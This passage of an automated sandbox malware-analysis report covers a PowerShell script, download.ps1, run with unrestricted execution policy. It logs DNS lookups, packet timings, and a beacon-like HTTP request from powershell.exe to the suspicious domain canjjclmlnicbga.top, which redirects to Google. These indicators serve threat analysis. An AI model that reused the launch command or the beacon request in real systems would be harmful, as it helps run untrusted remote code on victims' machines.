                                                                                                    Jan 8, 2025 17:34:55.568447113 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568559885 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568587065 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.568653107 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568708897 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.568774939 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568880081 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568954945 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.569009066 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.569116116 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.569171906 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.569231987 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.569411993 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.687072039 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.687182903 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.687429905 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.691415071 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.691553116 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.691690922 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.700182915 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.700293064 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.700506926 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.708797932 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.708908081 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.709110975 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.717320919 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.717427969 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.717617035 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.726003885 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.726058960 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.726248026 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.734853983 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.734944105 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.735129118 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.743302107 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.743355989 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.743540049 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.752043962 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.752070904 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.752324104 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.760726929 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.760767937 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.760998011 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.805927992 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.805967093 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.806155920 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.810328960 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.810400963 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.810595036 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.818977118 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.819073915 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.819264889 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.826443911 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.826551914 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.826739073 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.833967924 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.834074974 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.834201097 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.841355085 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.841453075 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.841661930 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.848859072 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.848964930 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.849201918 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.856363058 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.900914907 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:56.049226999 CET4970680192.168.11.2045.61.136.138
                                                                                                    Jan 8, 2025 17:34:56.049705982 CET4970780192.168.11.20172.217.1.100

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 8, 2025 17:34:54.353343964 CET5445653192.168.11.201.1.1.1
                                                                                                    Jan 8, 2025 17:34:54.554761887 CET53544561.1.1.1192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.005844116 CET4938153192.168.11.201.1.1.1
                                                                                                    Jan 8, 2025 17:34:55.125368118 CET53493811.1.1.1192.168.11.20

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 8, 2025 17:34:54.353343964 CET192.168.11.201.1.1.10xe705Standard query (0)canjjclmlnicbga.topA (IP address)IN (0x0001)false
                                                                                                    Jan 8, 2025 17:34:55.005844116 CET192.168.11.201.1.1.10x9417Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 8, 2025 17:34:54.554761887 CET1.1.1.1192.168.11.200xe705No error (0)canjjclmlnicbga.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                    Jan 8, 2025 17:34:55.125368118 CET1.1.1.1192.168.11.200x9417No error (0)www.google.com172.217.1.100A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • canjjclmlnicbga.top
                                                                                                    • www.google.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.11.204970645.61.136.138808388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 8, 2025 17:34:54.748087883 CET215OUTGET /qp49hfdl12htr.php?id=computer&key=36785799113&s=527 HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                    Host: canjjclmlnicbga.top
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 8, 2025 17:34:55.004087925 CET166INHTTP/1.1 302 Found
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Wed, 08 Jan 2025 16:34:54 GMT
                                                                                                    Content-Length: 0
                                                                                                    Connection: keep-alive
                                                                                                    Location: http://www.google.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.11.2049707172.217.1.100808388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 8, 2025 17:34:55.245980978 CET159OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                    Host: www.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 8, 2025 17:34:55.568238020 CET1289INHTTP/1.1 200 OK
                                                                                                    Date: Wed, 08 Jan 2025 16:34:55 GMT
                                                                                                    Expires: -1
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-olnO1MWTI8Z00ajeM1MUcg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                    Server: gws
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Set-Cookie: AEC=AZ6Zc-Vb-fdLF1Qha_gOAHSWDcfW_-CewE_4g3vNQyhUaG1HSOcL7gRBa7A; expires=Mon, 07-Jul-2025 16:34:55 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                    Set-Cookie: NID=520=Kvsi0gdXD_odc8InI1ofmnut1k0fzzVIUKsUAbQfUEB27sM9fbMUHkncBrkid31tKhZMAnS16c44kx-CJtX5QqPEhIlvpQ0TUhQ3TjEFtWeSVlZcxUC_5K5E92KNNQcqpkhbEHpiNtH0YuWnx7GD3vZql9MvJp0RIaV9lIQ3Zs8V9l04TXsbr9msJnV8KWGmQ-kvm6T71w; expires=Thu, 10-Jul-2025 16:34:55 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                    Accept-Ranges: none
                                                                                                    Vary: Accept-Encoding
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Data Raw: 35 38 34 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74
                                                                                                    Data Ascii: 5845<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features t
                                                                                                    Jan 8, 2025 17:34:55.568356991 CET1289INData Raw: 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74
                                                                                                    Data Ascii: o help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128
                                                                                                    Jan 8, 2025 17:34:55.568447113 CET1289INData Raw: 34 36 2c 31 33 36 32 2c 35 2c 39 32 31 2c 36 32 35 2c 35 36 2c 39 30 37 2c 32 37 31 2c 33 38 31 2c 33 34 2c 32 33 2c 33 39 39 2c 38 2c 32 31 33 2c 33 2c 31 31 2c 31 34 38 2c 32 2c 32 2c 33 34 30 2c 34 34 36 2c 31 2c 36 2c 32 32 35 2c 35 34 2c 33
                                                                                                    Data Ascii: 46,1362,5,921,625,56,907,271,381,34,23,399,8,213,3,11,148,2,2,340,446,1,6,225,54,3,564,306,153,117,151,361,282,432,603,700,197,251,142,603,474,245,440,832,258,220,10,266,857,964,328,1419,167,6,930,334,1421,546,143,428,1054,4183,21343718,41575,
                                                                                                    Jan 8, 2025 17:34:55.568559885 CET1289INData Raw: 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b
                                                                                                    Data Ascii: ;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=
                                                                                                    Jan 8, 2025 17:34:55.568653107 CET1289INData Raw: 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65
                                                                                                    Data Ascii: nt;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap
                                                                                                    Jan 8, 2025 17:34:55.568774939 CET1289INData Raw: 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 74 6f 20 2e 67 62 6d 2c 2e 67 62 74 6f 20 23 67 62 73 7b 74 6f 70 3a 32 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65
                                                                                                    Data Ascii: hadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-
                                                                                                    Jan 8, 2025 17:34:55.568880081 CET1289INData Raw: 70 61 6e 23 67 62 67 34 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 67 62 74 73 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73
                                                                                                    Data Ascii: pan#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .
                                                                                                    Jan 8, 2025 17:34:55.569009066 CET1289INData Raw: 6e 67 3a 32 35 70 78 20 35 70 78 20 30 7d 2e 67 62 74 6f 20 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 35 70 78 20 31 70 78 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 31 70 78 7d 23 67 62 69 34 69
                                                                                                    Data Ascii: ng:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background
                                                                                                    Jan 8, 2025 17:34:55.569116116 CET1289INData Raw: 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2d 68 76 72 2c 2e 67 62 6d 6c 31 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a
                                                                                                    Data Ascii: gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:non
                                                                                                    Jan 8, 2025 17:34:55.569231987 CET1289INData Raw: 69 6e 3a 31 36 70 78 20 30 20 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e
                                                                                                    Data Ascii: in:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,
                                                                                                    Jan 8, 2025 17:34:55.687072039 CET1289INData Raw: 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 34 38 70 78 3b 77 69 64 74 68 3a 34 38 70 78 7d 2e 67 62 6d 70 6e 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72
                                                                                                    Data Ascii: ;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;cursor:default !important;display:inline


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:11:34:49
                                                                                                    Start date:08/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                    Imagebase:0x7ff7205e0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:11:34:49
                                                                                                    Start date:08/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff676db0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:11:35:17
                                                                                                    Start date:08/01/2025
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff629c20000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Executed Functions

                                                                                                      Function 00007FF8758F7E86 Relevance: .5, Instructions: 472COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b335b6586bff93fe6318f39eb486848d81b0c944f662273630ac696a9bf7314c
                                                                                                      • Instruction ID: 24cbacd840ea05040f715864100a8b238fabdc6a55c69efbcf3d9c7d15c9bc16
                                                                                                      • Opcode Fuzzy Hash: b335b6586bff93fe6318f39eb486848d81b0c944f662273630ac696a9bf7314c
                                                                                                      • Instruction Fuzzy Hash: BAF19431A18A4D8FEBA8DF28C8457FA77E1FF58350F04426EE84DC7291DB7499858B81
                                                                                                      Function 00007FF8758F8C32 Relevance: .5, Instructions: 458COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8cc9404645ad22b9238f11cbe5bc4d98b55e516c0d9aa90790338ec9bebdfdc1
                                                                                                      • Instruction ID: 7b4b14ac5ae4316555e9f992f671ddca9617973078576313796f4a4b999b81c5
                                                                                                      • Opcode Fuzzy Hash: 8cc9404645ad22b9238f11cbe5bc4d98b55e516c0d9aa90790338ec9bebdfdc1
                                                                                                      • Instruction Fuzzy Hash: F6E1B431A18A4D8FEBA8DF28C8457FA77D1EF58350F14426EE84DC7291CF7498858B81
                                                                                                      Function 00007FF875B55FFF Relevance: .7, Instructions: 695COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1014370551.00007FF875B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF875B50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff875b50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b4b509f1868e252e94cf90d71c54b47961f29b7229af2c9a593cbe3e3ecfb4c5
                                                                                                      • Instruction ID: 20858515bf4e327d1349620edb70abe10774cda4706a0a728e6835f4a12d11e0
                                                                                                      • Opcode Fuzzy Hash: b4b509f1868e252e94cf90d71c54b47961f29b7229af2c9a593cbe3e3ecfb4c5
                                                                                                      • Instruction Fuzzy Hash: 58326F32D18A898FEB99EF28885577877E1FF59744F5800BAD40DCB282DF25AC85CB41
                                                                                                      Function 00007FF8758F8846 Relevance: .3, Instructions: 331COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: af2eb0324048936a4ec39acd4e85408140efbbfba2471e12f1c167f6b9c4f8da
                                                                                                      • Instruction ID: 0ba4ef7acab5904c9b9896a62a50be55fda17661be925163fe53c0c36de02f73
                                                                                                      • Opcode Fuzzy Hash: af2eb0324048936a4ec39acd4e85408140efbbfba2471e12f1c167f6b9c4f8da
                                                                                                      • Instruction Fuzzy Hash: 22B1B531618A4D4FEBA8DF28D8457F97BD1FF59350F04426EE84DC7292CB3498858B82
                                                                                                      Function 00007FF8757CEE20 Relevance: .1, Instructions: 129COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1010620881.00007FF8757CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8757CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8757cd000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9a79303c81fd7fcf56ea0475a3463a042ad5edd132ad641b312975689d1fc871
                                                                                                      • Instruction ID: a5e835227792192e6fb51b8a3b295ab5206c798114ba3be2a6438a139100933c
                                                                                                      • Opcode Fuzzy Hash: 9a79303c81fd7fcf56ea0475a3463a042ad5edd132ad641b312975689d1fc871
                                                                                                      • Instruction Fuzzy Hash: 6541257181DBC44FE7578B389851A523FF4EF532A0B0505EFD088CF0A3DA25A846C7A2
                                                                                                      Function 00007FF8758F247C Relevance: .1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 655ffab81a3c37227616140277d9f1fb75a0039cd66efaf1a46c0514f0faef89
                                                                                                      • Instruction ID: e19734546fec4403e17506fd005b381f18412455b7a184a559ef0dce9cc28b84
                                                                                                      • Opcode Fuzzy Hash: 655ffab81a3c37227616140277d9f1fb75a0039cd66efaf1a46c0514f0faef89
                                                                                                      • Instruction Fuzzy Hash: D031C43191CB4C9FDB1CDB5CA8466B9BBE0FBA8711F00422FE449D3251CB71A8558BC2
                                                                                                      Function 00007FF8758F2CE8 Relevance: .1, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dae952c8d604c37ec09f50b8532e5c2fdaf9d154aee101d7e8c5490cc11e3081
                                                                                                      • Instruction ID: 0322beb89260afdd3018c68ce2a54ec165c6e3a186cd68fb05deb8f31d0a0578
                                                                                                      • Opcode Fuzzy Hash: dae952c8d604c37ec09f50b8532e5c2fdaf9d154aee101d7e8c5490cc11e3081
                                                                                                      • Instruction Fuzzy Hash: CA21373190CB4C4FEB58DB9C9C4A7E9BBE0EB9A320F04422BD449C7196DA70A446CB91
                                                                                                      Function 00007FF8758F8344 Relevance: .1, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 91d75b850336cd8240c312ca414fcd158082a1b72f2e3aacdb53f872be008e9f
